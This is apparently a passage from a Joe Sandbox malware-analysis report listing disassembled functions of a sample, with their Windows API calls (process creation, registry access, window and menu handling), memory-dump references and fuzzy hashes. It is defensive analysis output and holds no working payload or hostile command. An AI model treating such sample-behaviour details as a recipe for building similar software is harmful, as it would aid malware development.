                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              • Opcode ID: fcad0cf06fd8ff615022edd9db873df9c4eb4f5d19603d9d090181d93f132b85
                                                                                                                                                                              • Instruction ID: b20d40db1a4df0f0a9af34a066665c2b70c71747ed0d0f195d4031b59e22ccb7
                                                                                                                                                                              • Opcode Fuzzy Hash: fcad0cf06fd8ff615022edd9db873df9c4eb4f5d19603d9d090181d93f132b85
                                                                                                                                                                              • Instruction Fuzzy Hash: A0217435600208AFDB10ABA9DC88DBFB7FCEB093A0B408126FA15DB360D674EC459764
                                                                                                                                                                              Function 0051A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0051A13B
                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0051A148
                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0051A153
                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0051A162
                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0051A16E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                              • Opcode ID: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                                                                                                                                              • Instruction ID: 85cf1029a4286a69af21a40f33c812d45be0f56bef466f88ac436e96a1710642
                                                                                                                                                                              • Opcode Fuzzy Hash: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                                                                                                                                              • Instruction Fuzzy Hash: FD118EB1150219BEEF114F65CC86EE77F6DFF08798F014215FA08A60A0C7769C61DBA4
                                                                                                                                                                              Function 0051E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051E14D
                                                                                                                                                                              • _memset.LIBCMT ref: 0051E15C
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0051E19D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                              • String ID: $?W$>W
                                                                                                                                                                              • API String ID: 3277943733-2305796706
                                                                                                                                                                              • Opcode ID: 98bf1ea74b9dd12bb90494ac76142d3dcd3aae35554662e77bf8ab5e1c07cd0d
                                                                                                                                                                              • Instruction ID: 7ec5c0e2da16911bf0b00b020667609913f0224c46cb35a91b14d0717aded148
                                                                                                                                                                              • Opcode Fuzzy Hash: 98bf1ea74b9dd12bb90494ac76142d3dcd3aae35554662e77bf8ab5e1c07cd0d
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF030F1940310BAF3106B65BC16F777AACEB153A4F004421FE08D52A1D2BA4E54F6B9
                                                                                                                                                                              Function 004CC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004CC6C0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CC701
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004CC729
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004CC856
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CC86F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                              • Opcode ID: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                                                                                                                                              • Instruction ID: f0e8ddc13f7a4569134f7607266501a819215f1e209eabdc556f42abff2c873f
                                                                                                                                                                              • Opcode Fuzzy Hash: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                                                                                                                                              • Instruction Fuzzy Hash: DBB15E7990024ADBDF50CFA8C580BEEBBB1FF08310F14952AEC59DB254DB34A941DB69
                                                                                                                                                                              Function 004F9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3253778849-0
                                                                                                                                                                              • Opcode ID: 37bb014bc863f8f3b18eb2b2da793edad7c61a4e9ddc16a2fab03f0e803c29a4
                                                                                                                                                                              • Instruction ID: 0a1810820ef45f6e83d32352d29605bd23edb81ed51495a415058847e285608d
                                                                                                                                                                              • Opcode Fuzzy Hash: 37bb014bc863f8f3b18eb2b2da793edad7c61a4e9ddc16a2fab03f0e803c29a4
                                                                                                                                                                              • Instruction Fuzzy Hash: FE617F3050025E9BDB01EF66CC81FFE77A9AF44308F04445EF9555B292EB39AD05CB69
                                                                                                                                                                              Function 00512EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512FA0
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512FE0
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00513003
                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051302C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051306F
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0051307C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4046560759-0
                                                                                                                                                                              • Opcode ID: 5fe4b868dcca041ccf08d5a9a132dd3a3e58e47f1ab92dc052fe06ad67ece434
                                                                                                                                                                              • Instruction ID: ce0290f9d0c8dd88b20387a597c2dc048fe58fac0b81dd6e402a1961ace88512
                                                                                                                                                                              • Opcode Fuzzy Hash: 5fe4b868dcca041ccf08d5a9a132dd3a3e58e47f1ab92dc052fe06ad67ece434
                                                                                                                                                                              • Instruction Fuzzy Hash: 23519C31108200AFD704EF65C895EAEBBF9FF88708F04481EF585872A1EB75E955DB62
                                                                                                                                                                              Function 004CDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$_wcscat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2037614760-0
                                                                                                                                                                              • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                              • Instruction ID: 7937496c4293db010549e46e08b51f924a4bed2734a37bb43fdbc1528cb0d048
                                                                                                                                                                              • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                              • Instruction Fuzzy Hash: 08510078D00115AACB51AF99C490EBEB7B0EF05314F50406FF981AB292DBBC5F82D799
                                                                                                                                                                              Function 004F2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004F2AF6
                                                                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 004F2B68
                                                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 004F2BC3
                                                                                                                                                                              • _memmove.LIBCMT ref: 004F2BED
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004F2C3A
                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F2C68
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1101466143-0
                                                                                                                                                                              • Opcode ID: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                                                                                                                                              • Instruction ID: 6975cc74dcef57d370c4218ce62fe3bd389cdea5771becee41b5db58082ba9ac
                                                                                                                                                                              • Opcode Fuzzy Hash: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                                                                                                                                              • Instruction Fuzzy Hash: 91517EB5A00209EFDB14CF58C880AAAB7B8FF4C314B15855AEE49DB310E374E951CFA4
                                                                                                                                                                              Function 005182DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenu.USER32(?), ref: 0051833D
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00518374
                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0051839C
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0051840B
                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00518419
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0051846A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 650687236-0
                                                                                                                                                                              • Opcode ID: d0e5bb6dac6e5c3da55c057a2262da66b6264aa1ff4380d5dfd5b362b5fbe22b
                                                                                                                                                                              • Instruction ID: ebf9cd61160008367a40abc72893217cb465169dd76540bb35cdd9e62a3a6427
                                                                                                                                                                              • Opcode Fuzzy Hash: d0e5bb6dac6e5c3da55c057a2262da66b6264aa1ff4380d5dfd5b362b5fbe22b
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A51AD71A00215AFDF11EF65C841AEEBBF4FF48714F14445AE911BB351CB74AE418BA4
                                                                                                                                                                              Function 004F54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F552E
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5579
                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 004F5599
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004F55CD
                                                                                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 004F562B
                                                                                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004F565C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3311875123-0
                                                                                                                                                                              • Opcode ID: d3573fefcf71071f73b2c950d744703bafcb9a6cb5671e9450f9e82ce4f6b8e3
                                                                                                                                                                              • Instruction ID: 28ba749e939a594dd7fb44ad7c88e1317dae7c14718c3971afe725b0ab9dca8f
                                                                                                                                                                              • Opcode Fuzzy Hash: d3573fefcf71071f73b2c950d744703bafcb9a6cb5671e9450f9e82ce4f6b8e3
                                                                                                                                                                              • Instruction Fuzzy Hash: 1251B070600A0DABEF10CF68D888BBEBBF5AF15318F50411AE729DA290D7789945CB59
                                                                                                                                                                              Function 004CB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 004CB1C1
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CB225
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004CB242
                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004CB253
                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 004CB29D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1827037458-0
                                                                                                                                                                              • Opcode ID: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                                                                                                                                              • Instruction ID: 7874a76e0149a7acf3b9d3705c23edc4bf370fe3c2a296813cec8d099864fdb3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6641E2741006009FC711DF28EC89F6A3BF8FF59364F04056DF9A9872A1C7359849EBA6
                                                                                                                                                                              Function 0051E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E21B
                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 0051E23F
                                                                                                                                                                              • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E29F
                                                                                                                                                                              • ShowWindow.USER32(?,00000004,?,?,00571810,00571810,?,0052E2D6), ref: 0051E2B1
                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 0051E2D5
                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0051E2F8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                              • Opcode ID: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                                                                                                                                              • Instruction ID: 3546bf9686f9a80ed057385eb56ef19f2a00f5fb75e37e63064e60d5eb63e8fa
                                                                                                                                                                              • Opcode Fuzzy Hash: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                                                                                                                                              • Instruction Fuzzy Hash: F5412F38600141EFEB26CF54C4AABD47FF5BB06314F1841B9EE698F6A2C771A885CB51
                                                                                                                                                                              Function 004EBC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004EBCD9
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004EBCE0
                                                                                                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004EBCEF
                                                                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 004EBCFA
                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004EBD29
                                                                                                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 004EBD3D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1413079979-0
                                                                                                                                                                              • Opcode ID: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                                                                                                                                              • Instruction ID: f37c99ab4e50f8c439dd18181343a8346353e68ef65ce7a52e7971bcbb487def
                                                                                                                                                                              • Opcode Fuzzy Hash: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                                                                                                                                              • Instruction Fuzzy Hash: A3217F72104249ABCF029F99ED49FEF7BB9EF04305F104055FE01A2260C77A8D65EBA5
                                                                                                                                                                              Function 0051E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                                • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
